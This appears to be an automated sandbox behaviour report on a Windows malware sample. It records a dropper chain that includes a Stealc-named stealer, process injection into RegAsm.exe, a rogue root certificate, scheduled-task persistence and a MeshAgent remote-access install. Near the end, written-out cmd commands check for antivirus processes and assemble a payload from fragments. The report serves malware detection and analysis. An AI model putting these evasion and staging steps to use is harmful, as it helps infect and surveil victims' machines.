Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133714024008958952"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	VMfZdiW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	VMfZdiW.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936fa0000006024b221ea3a6910a2dc08002b30309dac000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	VMfZdiW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

660 schtasks.exe
5640 schtasks.exe
2960 schtasks.exe
5368 schtasks.exe
2156 schtasks.exe

pid	process
660	schtasks.exe
5640	schtasks.exe
2960	schtasks.exe
5368	schtasks.exe
2156	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exeD9qjU3T0tH.exeRegAsm.exestealc_default2.exeM4ceNWFoxe.exepenis.exebundle.exepowershell.exeWaters.pifaxplong.exe

pid	process
2560	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
2560	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
3880	axplong.exe
3880	axplong.exe
2524	D9qjU3T0tH.exe
2524	D9qjU3T0tH.exe
4556	RegAsm.exe
4556	RegAsm.exe
4556	RegAsm.exe
4556	RegAsm.exe
2300	stealc_default2.exe
2300	stealc_default2.exe
4556	RegAsm.exe
4556	RegAsm.exe
4368	M4ceNWFoxe.exe
4368	M4ceNWFoxe.exe
4368	M4ceNWFoxe.exe
4368	M4ceNWFoxe.exe
4368	M4ceNWFoxe.exe
4368	M4ceNWFoxe.exe
2988	penis.exe
2988	penis.exe
2300	stealc_default2.exe
2300	stealc_default2.exe
4408	bundle.exe
4408	bundle.exe
2188	powershell.exe
2188	powershell.exe
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
2188	powershell.exe
4428	Waters.pif
4428	Waters.pif
4036	axplong.exe
4036	axplong.exe
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

chrome.exe

pid	process
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

D9qjU3T0tH.exeRegAsm.exeM4ceNWFoxe.exepenis.exebundle.exetasklist.exetasklist.exepowershell.exeacentric.exeRegAsm.exepowershell.exeWMIC.exe7zG.exe

description	pid	process
Token: SeDebugPrivilege	2524	D9qjU3T0tH.exe
Token: SeBackupPrivilege	2524	D9qjU3T0tH.exe
Token: SeSecurityPrivilege	2524	D9qjU3T0tH.exe
Token: SeSecurityPrivilege	2524	D9qjU3T0tH.exe
Token: SeSecurityPrivilege	2524	D9qjU3T0tH.exe
Token: SeSecurityPrivilege	2524	D9qjU3T0tH.exe
Token: SeDebugPrivilege	4556	RegAsm.exe
Token: SeDebugPrivilege	4368	M4ceNWFoxe.exe
Token: SeDebugPrivilege	2988	penis.exe
Token: SeBackupPrivilege	2988	penis.exe
Token: SeSecurityPrivilege	2988	penis.exe
Token: SeSecurityPrivilege	2988	penis.exe
Token: SeSecurityPrivilege	2988	penis.exe
Token: SeSecurityPrivilege	2988	penis.exe
Token: SeDebugPrivilege	4408	bundle.exe
Token: SeDebugPrivilege	3120	tasklist.exe
Token: SeDebugPrivilege	4084	tasklist.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2936	acentric.exe
Token: SeDebugPrivilege	4572	RegAsm.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeIncreaseQuotaPrivilege	4748	WMIC.exe
Token: SeSecurityPrivilege	4748	WMIC.exe
Token: SeTakeOwnershipPrivilege	4748	WMIC.exe
Token: SeLoadDriverPrivilege	4748	WMIC.exe
Token: SeSystemProfilePrivilege	4748	WMIC.exe
Token: SeSystemtimePrivilege	4748	WMIC.exe
Token: SeProfSingleProcessPrivilege	4748	WMIC.exe
Token: SeIncBasePriorityPrivilege	4748	WMIC.exe
Token: SeCreatePagefilePrivilege	4748	WMIC.exe
Token: SeBackupPrivilege	4748	WMIC.exe
Token: SeRestorePrivilege	4748	WMIC.exe
Token: SeShutdownPrivilege	4748	WMIC.exe
Token: SeDebugPrivilege	4748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4748	WMIC.exe
Token: SeRemoteShutdownPrivilege	4748	WMIC.exe
Token: SeUndockPrivilege	4748	WMIC.exe
Token: SeManageVolumePrivilege	4748	WMIC.exe
Token: 33	4748	WMIC.exe
Token: 34	4748	WMIC.exe
Token: 35	4748	WMIC.exe
Token: 36	4748	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4748	WMIC.exe
Token: SeSecurityPrivilege	4748	WMIC.exe
Token: SeTakeOwnershipPrivilege	4748	WMIC.exe
Token: SeLoadDriverPrivilege	4748	WMIC.exe
Token: SeSystemProfilePrivilege	4748	WMIC.exe
Token: SeSystemtimePrivilege	4748	WMIC.exe
Token: SeProfSingleProcessPrivilege	4748	WMIC.exe
Token: SeIncBasePriorityPrivilege	4748	WMIC.exe
Token: SeCreatePagefilePrivilege	4748	WMIC.exe
Token: SeBackupPrivilege	4748	WMIC.exe
Token: SeRestorePrivilege	4748	WMIC.exe
Token: SeShutdownPrivilege	4748	WMIC.exe
Token: SeDebugPrivilege	4748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4748	WMIC.exe
Token: SeRemoteShutdownPrivilege	4748	WMIC.exe
Token: SeUndockPrivilege	4748	WMIC.exe
Token: SeManageVolumePrivilege	4748	WMIC.exe
Token: 33	4748	WMIC.exe
Token: 34	4748	WMIC.exe
Token: 35	4748	WMIC.exe
Token: 36	4748	WMIC.exe
Token: SeRestorePrivilege	1652	7zG.exe

Suspicious use of FindShellTrayWindow 32 IoCs

Processes:

Waters.pif7zG.exechrome.exe

pid	process
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
1652	7zG.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe

Suspicious use of SendNotifyMessage 29 IoCs

Processes:

Waters.pifchrome.exe

pid	process
4428	Waters.pif
4428	Waters.pif
4428	Waters.pif
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe
2756	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exegold.execrypteda.exeNework.exeneedmoney.exe2.exe

description	pid	process	target process
PID 2560 wrote to memory of 3880	2560	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe	axplong.exe
PID 2560 wrote to memory of 3880	2560	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe	axplong.exe
PID 2560 wrote to memory of 3880	2560	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe	axplong.exe
PID 3880 wrote to memory of 380	3880	axplong.exe	gold.exe
PID 3880 wrote to memory of 380	3880	axplong.exe	gold.exe
PID 3880 wrote to memory of 380	3880	axplong.exe	gold.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 380 wrote to memory of 4556	380	gold.exe	RegAsm.exe
PID 3880 wrote to memory of 832	3880	axplong.exe	crypteda.exe
PID 3880 wrote to memory of 832	3880	axplong.exe	crypteda.exe
PID 3880 wrote to memory of 832	3880	axplong.exe	crypteda.exe
PID 832 wrote to memory of 2524	832	crypteda.exe	D9qjU3T0tH.exe
PID 832 wrote to memory of 2524	832	crypteda.exe	D9qjU3T0tH.exe
PID 832 wrote to memory of 2524	832	crypteda.exe	D9qjU3T0tH.exe
PID 832 wrote to memory of 4368	832	crypteda.exe	M4ceNWFoxe.exe
PID 832 wrote to memory of 4368	832	crypteda.exe	M4ceNWFoxe.exe
PID 832 wrote to memory of 4368	832	crypteda.exe	M4ceNWFoxe.exe
PID 3880 wrote to memory of 64	3880	axplong.exe	Nework.exe
PID 3880 wrote to memory of 64	3880	axplong.exe	Nework.exe
PID 3880 wrote to memory of 64	3880	axplong.exe	Nework.exe
PID 64 wrote to memory of 400	64	Nework.exe	Hkbsse.exe
PID 64 wrote to memory of 400	64	Nework.exe	Hkbsse.exe
PID 64 wrote to memory of 400	64	Nework.exe	Hkbsse.exe
PID 3880 wrote to memory of 2300	3880	axplong.exe	stealc_default2.exe
PID 3880 wrote to memory of 2300	3880	axplong.exe	stealc_default2.exe
PID 3880 wrote to memory of 2300	3880	axplong.exe	stealc_default2.exe
PID 3880 wrote to memory of 4804	3880	axplong.exe	needmoney.exe
PID 3880 wrote to memory of 4804	3880	axplong.exe	needmoney.exe
PID 3880 wrote to memory of 4804	3880	axplong.exe	needmoney.exe
PID 3880 wrote to memory of 2988	3880	axplong.exe	penis.exe
PID 3880 wrote to memory of 2988	3880	axplong.exe	penis.exe
PID 3880 wrote to memory of 2988	3880	axplong.exe	penis.exe
PID 3880 wrote to memory of 4408	3880	axplong.exe	bundle.exe
PID 3880 wrote to memory of 4408	3880	axplong.exe	bundle.exe
PID 3880 wrote to memory of 4408	3880	axplong.exe	bundle.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 4804 wrote to memory of 4980	4804	needmoney.exe	svchost015.exe
PID 3880 wrote to memory of 2936	3880	axplong.exe	acentric.exe
PID 3880 wrote to memory of 2936	3880	axplong.exe	acentric.exe
PID 3880 wrote to memory of 2936	3880	axplong.exe	acentric.exe
PID 3880 wrote to memory of 1716	3880	axplong.exe	2.exe
PID 3880 wrote to memory of 1716	3880	axplong.exe	2.exe
PID 3880 wrote to memory of 1716	3880	axplong.exe	2.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe
PID 1716 wrote to memory of 3336	1716	2.exe	aspnet_regiis.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
"C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2560

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3880

C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832

C:\Users\Admin\AppData\Roaming\D9qjU3T0tH.exe
"C:\Users\Admin\AppData\Roaming\D9qjU3T0tH.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524

C:\Users\Admin\AppData\Roaming\M4ceNWFoxe.exe
"C:\Users\Admin\AppData\Roaming\M4ceNWFoxe.exe"
5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:64

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:400

C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2300

C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4804

C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
5⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
"C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
5⤵
PID:3336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 412
6⤵
- Program crash
PID:3684

C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
5⤵
PID:3636

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
6⤵
PID:4904

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
6⤵
- System Location Discovery: System Language Discovery
PID:452

C:\Windows\SysWOW64\cmd.exe
cmd /c md 607698
6⤵
- System Location Discovery: System Language Discovery
PID:2012

C:\Windows\SysWOW64\findstr.exe
findstr /V "MaskBathroomCompositionInjection" Participants
6⤵
PID:3128

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
6⤵
- System Location Discovery: System Language Discovery
PID:532

C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
Waters.pif Q
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4428

C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe
"C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe"
7⤵
- Executes dropped EXE
PID:660

C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
8⤵
- Sets service image path in registry
- Executes dropped EXE
- Drops file in Program Files directory
PID:412

C:\Users\Admin\AppData\Local\Temp\1000418001\66ed8969a40d8_15_20240920173635.exe
"C:\Users\Admin\AppData\Local\Temp\1000418001\66ed8969a40d8_15_20240920173635.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
8⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe
"C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe"
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5464

C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
6⤵
